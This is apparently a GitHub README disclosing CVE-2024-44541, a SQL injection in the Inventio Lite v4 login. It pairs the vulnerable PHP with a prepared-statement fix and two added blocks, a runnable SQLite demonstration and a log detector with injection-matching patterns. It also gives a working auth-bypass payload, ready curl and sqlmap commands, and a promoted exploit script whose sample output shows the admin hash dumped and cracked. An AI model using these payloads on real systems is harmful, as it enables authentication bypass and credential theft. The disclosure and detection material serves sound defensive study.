This repository details a SQL Injection vulnerability in Inventio Lite v4, including exploitation steps and a Python script to automate the attack. It provides information on the vulnerable code, recommended fixes, and how to extract and decrypt administrative credentials.

pointedsec/CVE-2024-44541


CVE-2024-44541: SQL Injection Vulnerability in Inventio Lite v4

Description

Inventio Lite v4 is vulnerable to SQL Injection (SQLi) in the action=processlogin endpoint (/inventio-lite/?action=processlogin). This vulnerability allows attackers to inject arbitrary SQL queries via the username parameter in POST requests, potentially leading to unauthorized access and data extraction.

Vulnerable Code

The vulnerable code is as follows:

if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();
    $sql = "select * from user where (email= \"".$user."\" or username= \"".$user."\") and password= \"".$pass."\" and is_active=1";
    $query = $con->query($sql);
    $found = false;
    $userid = null;
    while($r = $query->fetch_array()){
        $found = true;
        $userid = $r['id'];
    }
}

Screenshot of the Vulnerable Code: [image: Vulnerable Code]

Fixed Code

The issue is fixed by using prepared statements:

if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();

    // Prepare the query
    $stmt = $con->prepare("
        SELECT * FROM user 
        WHERE (email = ? OR username = ?) 
        AND password = ? 
        AND is_active = 1
    ");

    // Bind parameters
    $stmt->bind_param("sss", $user, $user, $pass);

    // Execute query
    $stmt->execute();

    // Get result
    $result = $stmt->get_result();
    $found = false;
    $userid = null;

    while($r = $result->fetch_assoc()){
        $found = true;
        $userid = $r['id'];
    }

    // Close statement
    $stmt->close();
}
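The following is an added example, not code from the Inventio Lite project or from this repository. It re-creates the login query from the two PHP listings above against an in-memory SQLite table so the difference can be run and observed: the concatenated query lets the README's auth-bypass payload log in without a valid password, while the parameterized query rejects it. SQLite stands in for MySQL here, and because SQLite treats double quotes as identifier quoting, the query and the payload use a single quote (') where the MySQL query on this page uses a double quote ("); the structure is otherwise the same. The table contents and the user names are constructed. Note that the fix above only removes the injection: the password storage format sha1(md5($password)) is unsalted and fast, which is what lets the repository's own script recover the admin password from the dumped hash.

```python
"""Added example: concatenated vs. parameterized login query (SQLite stand-in).

Assumptions: SQLite instead of MySQL, single-quote string literals instead of
MySQL's double quotes, and constructed sample users. Not project code.
"""
import hashlib
import sqlite3


def hash_password(password: str) -> str:
    """Mirror the PHP sha1(md5($password)): SHA-1 over the hex MD5 digest."""
    md5_hex = hashlib.md5(password.encode()).hexdigest()
    return hashlib.sha1(md5_hex.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed sample data: one disabled account, then one active admin."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, username TEXT,"
        " password TEXT, is_active INTEGER)"
    )
    con.executemany(
        "INSERT INTO user (email, username, password, is_active) VALUES (?, ?, ?, ?)",
        [
            ("old@example.test", "old", hash_password("retired"), 0),
            ("admin@example.test", "admin", hash_password("correct horse"), 1),
        ],
    )
    return con


def login_vulnerable(con: sqlite3.Connection, user: str, password: str):
    """Same shape as the vulnerable PHP: user input concatenated into the SQL.

    Like the PHP while-loop, this keeps the id of the LAST matching row.
    """
    pw_hash = hash_password(password)
    sql = (
        "select * from user where (email= '" + user + "' or username= '" + user
        + "') and password= '" + pw_hash + "' and is_active=1"
    )
    userid = None
    for row in con.execute(sql):
        userid = row[0]
    return userid


def login_fixed(con: sqlite3.Connection, user: str, password: str):
    """Same query with placeholders: values never become part of the SQL text."""
    pw_hash = hash_password(password)
    userid = None
    for row in con.execute(
        "SELECT id FROM user WHERE (email = ? OR username = ?)"
        " AND password = ? AND is_active = 1",
        (user, user, pw_hash),
    ):
        userid = row[0]
    return userid


# Single-quote form of the README payload `") or 1=1-- -` (see note above).
BYPASS_PAYLOAD = "') or 1=1-- -"


def demo() -> dict:
    """Run both versions with the bypass payload and with real credentials."""
    con = build_db()
    return {
        # the `-- -` comments out the password check; `or 1=1` matches every row
        "vuln_bypass": login_vulnerable(con, BYPASS_PAYLOAD, "blablabla"),
        "vuln_legit": login_vulnerable(con, "admin", "correct horse"),
        # the whole payload is compared as a literal username/email: no match
        "fixed_bypass": login_fixed(con, BYPASS_PAYLOAD, "blablabla"),
        "fixed_legit": login_fixed(con, "admin", "correct horse"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running the block shows the vulnerable login returning the admin's id for the payload (the last row the injected `or 1=1` matches, regardless of is_active), while the parameterized login returns nothing for it and still accepts the real credentials.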

Exploitation

Auth Bypass Payload

To exploit this vulnerability, use the following payload:

user -> ") or 1=1-- - 
pass -> blablalba

Example of the attack using curl:

$ curl -X POST http://192.168.1.51/inventio-lite/?action=processlogin -d 'username=%22%29%20or%201%3D1--%20-&password=blablabla' -v && echo ""

SQLMap Example

$ sqlmap -u http://192.168.1.51/inventio-lite/?action=processlogin --data="username=*&password=*" --level 5 --risk 3 --dbms=mysql --dbs --prefix='")' --batch --dbs
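From the defender's side, the curl and sqlmap invocations above have a recognisable footprint: a username parameter that carries a closing quote and parenthesis followed by a boolean operator or a SQL comment marker, arriving in bursts against action=processlogin from one client. The block below is an added example, not part of this repository or of Inventio Lite: a small detector that parses constructed request-log lines (the log format, IPs and timestamps are invented for the example; real web servers only record POST bodies when a WAF or audit log is configured to do so), URL-decodes the username field and flags both the payload shape and sqlmap-style request bursts.

```python
"""Added example: detection of the processlogin SQLi pattern in request logs.

Assumptions: the line format "<ts> <ip> <method> <path> body=<urlencoded>"
and all sample entries are constructed for this example; adjust parse_line
to the log source actually in use. Not project code.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs

# Constructed sample log (documentation IP ranges only). Line 1 is the
# URL-encoded body from the README's curl example; lines 3 and 5 are the
# kind of variants a scanner sends with the same `")` prefix; the rest are
# legitimate logins, including one with an apostrophe in the name.
SAMPLE_LOG = """\
2024-09-01T10:00:01Z 203.0.113.7 POST /inventio-lite/?action=processlogin body=username=%22%29%20or%201%3D1--%20-&password=blablabla
2024-09-01T10:00:05Z 198.51.100.2 POST /inventio-lite/?action=processlogin body=username=alice%40example.test&password=hunter2
2024-09-01T10:00:06Z 203.0.113.7 POST /inventio-lite/?action=processlogin body=username=%22%29--%20-&password=x
2024-09-01T10:00:06Z 203.0.113.7 POST /inventio-lite/?action=processlogin body=username=admin%22&password=x
2024-09-01T10:00:07Z 203.0.113.7 POST /inventio-lite/?action=processlogin body=username=%22%29%20OR%201%3D1--%20-&password=x
2024-09-01T10:00:09Z 198.51.100.9 POST /inventio-lite/?action=processlogin body=username=O%27Brien&password=secret
2024-09-01T10:00:12Z 198.51.100.9 GET /inventio-lite/?action=login body=
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) body=(?P<body>.*)$"
)

# A quote closing the string (optionally followed by `)`) and then a boolean
# operator, or a quote/parenthesis followed by a comment opener. A lone quote
# (admin") or an apostrophe inside a name (O'Brien) does not match.
SQLI_RE = re.compile(
    r"""(["']\s*\)|["']\s+|\)\s*)\s*(or|and)\b|["'\)]\s*(--|#|/\*)""",
    re.IGNORECASE,
)


def parse_line(line: str):
    """Split one log line into fields and decode the POST body's username."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    params = parse_qs(rec["body"], keep_blank_values=True)
    rec["username"] = params.get("username", [""])[0]
    return rec


def looks_injected(username: str) -> bool:
    """True when the decoded username has the quote/operator or comment shape."""
    return SQLI_RE.search(username) is not None


def analyze(log_text: str, burst_threshold: int = 4, window_seconds: int = 60):
    """Return (flagged, burst_ips).

    flagged: (line number, client ip, decoded username) for payload-shaped
    logins; burst_ips: clients with >= burst_threshold POSTs to
    action=processlogin inside any window_seconds-long window.
    """
    flagged = []
    per_ip = defaultdict(list)
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if "action=processlogin" not in rec["path"]:
            continue
        if looks_injected(rec["username"]):
            flagged.append((n, rec["ip"], rec["username"]))
        per_ip[rec["ip"]].append(rec["ts"])

    bursts = set()
    for ip, times in per_ip.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j < len(times) and (times[j] - times[i]).total_seconds() <= window_seconds:
                j += 1
            if j - i >= burst_threshold:
                bursts.add(ip)
                break
    return flagged, sorted(bursts)


if __name__ == "__main__":
    hits, burst_ips = analyze(SAMPLE_LOG)
    for n, ip, user in hits:
        print(f"line {n}: {ip} username={user!r}")
    print("burst sources:", burst_ips)
```

The two signals are deliberately separate: the pattern match catches a single hand-crafted request like the curl example, while the burst count catches an automated run such as the sqlmap command even if its individual payloads are encoded differently from what the regex expects. Both thresholds are starting points to tune against the site's real login traffic.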

Exploit Script

To automate the exploitation and extraction of the administrator's username and password hash, you can use the provided Python script, sqli.py.

Clone this repository:

git clone https://github.com/pointedsec/CVE-2024-44541

Then install the requirements with pip:

pip install -r requirements.txt

Modify the following variables in the script as needed:

Then execute the script. It dumps the Administrator username and password hash, then tries to crack the hash using the SHA1(MD5(password)) format.

Example output:

$ python3 sqli.py 
[*] Checking if target is vulnerable
[+] Target Vulnerable!
[*] Dumping Administrator username...
[◤] Extracting Username: -> POINTEDSEC@GMAIL.COM
[/] Extracting Admin Password Hash: Final Admin Hash: 90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad
[+] Password Decrypted! -> POINTEDSEC@GMAIL.COM:admin
[*] Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations

Impact

Confidentiality: Attackers can dump the entire database, exposing sensitive data such as user credentials and personal information.

Integrity: Attackers can bypass authentication and gain administrative access, allowing them to modify or delete data.

References

Credits

This vulnerability was identified by Andrés Del Cerro. For further details, please contact me at pointedpentesting@gmail.com
